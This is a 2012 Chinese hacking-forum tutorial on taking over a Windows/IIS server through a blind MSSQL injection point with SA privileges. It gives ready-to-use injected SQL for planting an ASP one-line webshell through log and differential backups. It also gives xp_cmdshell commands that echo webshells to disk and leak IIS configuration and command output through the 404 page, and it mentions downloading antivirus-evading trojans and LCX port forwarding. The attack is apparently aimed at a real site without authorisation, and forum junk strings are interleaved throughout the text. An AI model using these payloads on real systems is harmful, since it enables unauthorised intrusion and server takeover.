中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]

作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
1 l6 j  l$ X# X0 A) ^" i  @
7 i! J. ^5 Y1 |5 \+ S
, q. K- k& z2 P                                                             欢迎高手访问指导,欢迎新手朋友交流学习。; k: c; A' A' ~* l
& |, M3 C! G8 [" X5 p6 h8 M* {
                                                                 4 d$ F9 `+ Q) V( P/ n# |
                                                                 % E! [% x7 g1 z% P! s; V
                                                                  论坛: http://www.90team.net/% ?7 u# X1 ]8 `

. X) O; v. r' V+ k3 e' Y  C* z' E! r- L4 n  }' K3 N
+ A( x3 }: t# F2 X, k
友情检测国家人才网; \9 `; |$ `0 v: _; R
, J: ?5 k  c. N; u
( X) a1 \9 Q2 a, j2 W1 P1 x
内容:MSSQL注入SA权限不显错模式下的入侵" ?, e$ x3 j2 ^$ f4 q! g
% z* v1 n: M6 j" J( |( E
' A5 v# Z! j) _) S, W3 {' C5 `
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。: e3 N: L( a5 Q$ A, `  [$ [
5 u/ v! q+ ?8 I$ W
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
* ~4 U/ X9 h9 V' N1 @/ _+ \0 C5 I! W

. I/ O  X! j* y! |7 {这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。* j3 e  {  U% R6 ]$ R
" x4 J" b0 e% ^; [3 U5 s
思路:; s3 Q8 S) U  b
, o/ E* n5 S. k' h$ ]4 Q, s
首先:! m; w! Q/ o: G4 U

# F7 F) x1 q" Z  F2 E# E4 H通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
. _& X$ T& ]7 b( S6 {
; D) W) Z( \' Y, `' q0 i1.日志备份获得Webshell' J; \! |$ R4 u; i; `

8 c. }, F5 u4 B9 \: ?, M$ e, R2.数据库差异备份获得Webshell. e; }7 a( W+ H. q0 I* h% o+ G! U

0 A7 {" Q; T6 B6 f7 E  G4.直接下载免杀远控木马。
" Z. z3 z" T0 |  s# D
" q. P; u9 J' _- V  @7 |5.直接下载LCX将服务器端口转发出来1 L0 K4 ?1 n, t6 }* d) N

- }1 ]& o3 W9 [* b: V% H. V, s/ v  Z6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。; s2 l+ T8 j' ]4 e8 A

+ B# \) P& ^1 e0 x0 K' C
( ]* Z% I3 \) [1 L* m% g) d$ S& a3 C$ C' S0 k* I  Y
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, # r* O1 |4 s% T' Q  c

" i# m( ?8 c# {我直接演示后面一个方法
. O! v% Q, _+ y5 Z' b+ `5 Z- B! U. G+ V& S# O

, N; @8 K9 B  v# b- A" A分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL - }! x/ N/ K; T6 O/ m6 m" p, M: v
& x& ?/ F& D6 g# P) M

- N  E0 {7 w, E" Q' N2 T- ^/ x& w' P8 v4 @3 y) [) s% [
6 U/ R' f, i% d- f* R6 ]2 W2 g9 I8 E
◆日志备份:
# M/ O# x# G5 L, R! q) O0 ~* p$ i# _+ o0 k

$ z* ]# `2 k9 J1. 进行初始备份% c1 e+ [- Q' m4 B$ W
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
( c+ Y. E% Z. M9 Y5 N3 M0 u
% P9 T( t) T8 t2. 插入数据1 n+ p6 ?: A' U8 A2 E" y1 P. L
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
4 l2 q. s# m0 Q+ h% y( ~# x! j, ^# J0 j+ z* t7 H
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
, V* v' Z* I, L' [6 ]  
. Z  A  R! b5 D  m/ o9 |9 q3. 备份并获得文件,删除临时表
1 Y. S  N5 v0 H+ P/ p+ [* y;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
! c- P( b2 {4 w: G+ A! w, s; G; ]0 \
* q$ S0 W' P8 ]
1 F; P, d7 n# ^8 y% h$ g
) e& O6 u! M. W8 j% e! [◆数据库差异备份
4 x6 @3 u2 u& g% `& @. s7 C( S9 D
2 O/ {+ R$ L* u4 r(1. 进行差异备份准备工作
$ ^: p) R! ^% a) o, c
! J* M' E9 m4 N4 I* J; q;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--/ z% G( K9 W4 W6 k2 T% t- `
* V! u7 O# n/ Q1 P
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
0 t' I! r, w) t2 N 6 a! n8 K8 o' a8 ?8 ]! d

% q7 r: ~; m9 Y4 f. I6 U0 Y(2. 将数据写入到数据库+ s, c0 ?# V2 D/ ]
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
9 E; J6 j1 W! d4 Z4 t) z& b) ?; M* E% e: s
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>) J- j7 f2 B" v' Z
( R- V/ K7 q2 p5 w+ {9 ^
3. 备份数据库并清理临时文件
8 m% L) Q. f2 E8 P& L# ~1 u- H. B" Y& h
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
: R# K* W' _- u5 l) v! F6 `! M# z" U& \/ m! m; o* q
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
( K% ]3 a1 ?. U8 ?, ]" r! f  B4 N: B/ R1 Z2 k
/ N" |( E' @  B0 h, w( |

0 y+ R( Z/ H7 ]用^转义字符来写ASP(一句话木马)文件的方法:   8 U1 z7 U$ H8 d9 F

; F# N( o. @1 i0 |5 ~1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--, d! {, U' S9 R% e, U. W% Y1 D
: k7 W& r* q% |+ g7 B5 c2 H. t
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp $ d5 r# @: A$ a+ Y) j! m, i
  m9 r0 k) u4 s. F
读取IIS配置信息获取web路径
( R2 }: `- G9 q% y
* g+ W+ }* T& ?. o     
/ A' M; `- E4 N1 o3 }, r     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
' R8 q6 b' b' m$ s2 m% w+ W: o% j* j7 L. L0 H0 o9 ~; L
执行命令3 H# E0 {) x, g
     4 v  N3 t6 p' C  e0 t! [
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--& K! z2 y! t4 |6 n( C5 M& {2 Y

9 v8 c8 D. G5 a* B/ I0 e" |1 v) ?3 R+ k0 u; \
) U, ^' Y: d9 Z& k8 B7 e+ d

) x. W$ B# a) S
. R* G# w$ n- p; g$ n0 U: O
: `# j6 j2 [0 [+ c. M
3 L1 |, M' B: L, q" n9 d% s6 Y
9 T4 a+ ?+ v  S+ i3 y  ^) _$ E5 J. y8 W" H

( e' N" w# }3 T. m
! _* X; F# L" Y6 g. ?+ f& R: \, l0 x* o4 a+ L
/ i- E. O( J8 a" h; o# f$ X8 E

( y4 r! y5 F$ k7 m) N! z( E
0 T0 _1 {9 ?, E9 J% [
2 i' V  E# S) L. {8 ]+ \* o5 o
, H! y/ j* A3 ?) J8 l- i9 h9 o$ p
0 x3 [: Q9 Y# W+ J  [: u1 m
) f" U7 k. q, x1 K' E8 X3 V3 f
6 |) O! B" l8 Z3 H2 }2 j9 f$ J5 v. C4 O. Z2 E) ^

( Y2 |' j1 Z; Y/ ?  {& H, z* x/ f
1 `5 n% P9 u/ _/ p7 x- N" U2 X" q' D) F# F6 x1 o" U( }

8 k& }6 N' ~  v, C" m9 ]. ]* w# @6 u: Y7 ^4 x0 a
9 o0 J& \. x, A% Q! w+ t; t) O9 E: J

* _. B. D2 L1 c. a( O( b& u$ [  W* S2 F7 z3 i# Q
% T3 v" c+ g4 |9 I
. |) f/ N  `. ]6 c0 I1 x) k% j
/ ]0 F+ E% F# V) F3 A" J- g

% z' C. G; ^+ k) b6 P" l$ f: D* i0 a8 K0 s* m$ h! j
; Z: v" q& S, D, c! Z

( d3 P: V5 a  D$ x* q
8 L, g1 k6 ]) Z# r( ~2 ~) b( u" \' j5 @2 }5 \6 r

" z( n: ]4 A7 ?" J. u! |0 y4 o) F

% m/ E- [3 X- i8 |7 W' T  _. t: \( q+ P% g
( ^+ m9 o* Y- a( `  o+ B

) o+ ~: f0 e; P% R/ c7 v! t8 J
  `9 q' z7 X' }$ |
: r/ R1 s2 v8 n( K9 x
# ]$ i  B8 e; M" d9 Q5 v/ p. B( p! _* V& A) w$ }





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2